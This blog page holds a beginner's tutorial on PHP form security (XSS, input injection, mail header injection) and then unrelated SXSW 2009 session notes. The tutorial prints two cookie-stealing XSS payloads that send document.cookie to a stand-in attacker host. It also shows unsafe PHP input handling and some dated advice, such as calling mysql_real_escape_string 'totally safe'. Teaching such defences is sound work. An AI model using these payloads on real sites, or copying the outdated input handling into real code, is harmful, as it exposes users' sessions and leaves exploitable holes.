BLOG: Mitch Wilson, Austin TX Web & Multimedia Developer – Austin, TX

HTML, JavaScript and PHP form security

How about a refresher on PHP form security? Follow these simple steps to cover the basics. Then sleep better at night knowing you have improved the World Wide Web. (Seriously, get some good sleep, you need it.)

Know thy enemy

The whole security issue comes from two simple facts:

• First fact: Certain text characters and series of characters have special meaning in programming.
  Example: A left angle bracket, in HTML context, starts a tag. But in JavaScript, it means less than.
• Second fact: Web sites implement online forms that let users upload code to run on the server.
  Example: In the comments form, users type text in various text fields. But is the user entering just plain text and allowed tags, or are they entering carefully crafted text containing HTML, JavaScript or some other language meant to run malicious code either on your server or in another user's browser (while visiting your site)?

Malicious client-side HTML and JavaScript

A left angle bracket, in HTML, starts an HTML tag. The series of characters <script> starts a script tag. If you allow a user to submit html tags in your form, you have just opened the door to attack. For example, here is a common type of attack where the attacker posts a malicious link as part of their message or comment to the target Web site. The following example uses HTML and JavaScript entered in the message body. Any cookies you set for that user (who clicks the link) can be read by the attacker. When a user clicks the link, the browser passes the user's cookie information, from the current Web site (yours), as a query string to their PHP file on the attacker's server:

<a href="http://badsite/attacker.php?cookie=<script>document.cookie;</script>">Click here to win</a>

Of course, if you do not filter out or sanitize the data in any way and allow JavaScript code to run, the attacker wouldn't even need the user to click a link. They would just enter a simple block of JavaScript within a <script> tag in their comment:

Hi, great site! <script>location="http://badsite.com/attacker.php?cookie="+document.cookie;</script>

Now we've seen a client-side attack using HTML, JavaScript and PHP. Let's look at a server side attack example, then we'll see how to combat both of them.

Malicious server-side PHP
By adding \r\n in a field that will be used to create an email header for the PHP mail() function, an attacker can write their own email and send it from your Website to whomever they want. Your site's online email form will be used to spam other people. Only these versions of PHP are affected, PHP 4 <= 4.4.6 and PHP 5 <= 5.2.

The local-part of the e-mail address may use any of these ASCII characters:

• Uppercase and lowercase English letters (a-z, A-Z)
• Digits 0 through 9
• Characters ! # $ % & ' * + - / = ? ^ _ ` { | } ~
• Character . provided that it is not the first nor last character, nor may it appear two or more times consecutively.

1. // copy the value form $_GET to $id

2. $id = $_GET['id'];

3. echo "thanks for sending me $id, dude!";

4.  

5. // just use the $_GET val directly

6. echo 'it\'s even more awesome to grab '.$_GET['id'].' directly from input, right?';

1. // escaped, so not a potential SQL injection threat.

2. $id = mysql_real_escape_string($_GET['id']);

3. echo "Now I know that $id is totally safe to insert into my database";

4.  

5. // cast as int, so

6. $id = intval($_GET['id']);

7. echo "$id is most certainly an integer now";

Ninja Webmaster Techniques

• Encode using htmlentities()
• Strip suspicious special characters like backslashes and curly braces

HTML and JavaScript InjectionPHP mail() Header Vulnerabilities

• Cross site scripting (XSS)
  Example: Adding a script tag in a comment on your site to read your user's cookies.
• Input injection
  Example: Adding malicious PHP code in your form field then submitting to run on your server.
• Mail header injection
  Example: Adding \r\n in an email form field and then adding custom malicious email headers to send spam from your Website.

Disclaimer

I am not a security professional. I am a Web developer, like you. I presented common best practices. In addition, you should have a professional hosting service or server administrator who knows what they are doing, and you should communicate with them and follow their advice to make sure your Web site is as secure as possible.

Day 2: SXSW Interactive 2009

Day two, I coverd 5 sessions. That's right. I session jumped the last three all in one hour, 20 minutes each.

Even Faster Websites

Steve Souders wrote the book, "High Performance Web sites" published by O'Reilly in 2007. He is methodical and makes extensive use of yslow and a packet sniffer. Steve demonstrated the performance hit of including inline JavaScript after a link to an external CSS stylesheet. Bascially, the browser will wait for the CSS to finish downloading before proceeding to execute the JavaScript. Other insights included no not using HTML to write script elements. Instead, dynamically add the script element. Doing so avoids inline Javascript that blocks parallel downloading.

First Year as a Freelancer

This was a session I will have to write more on later, since I took so many notes. I'll just say that I was really inspired by this session and made some contacts for possible collaboration later.

Freelance to Agency

A panel discussion with some really smart people nice enough to share their wisdom: Kristina Halvorson (Brain Traffic), Jeffrey Zeldman (Happy Cog, A List Apart, Zeldman.com) , Roger Black and Whitney Hess. If you have't guessed, I'm a full-time freelancer now. So this was a welcome follow up to the previous session about freelancing as well.

Interface Lessons Learned from Games

It's really late and I am going to stop writing very soon. More on this and the rest later.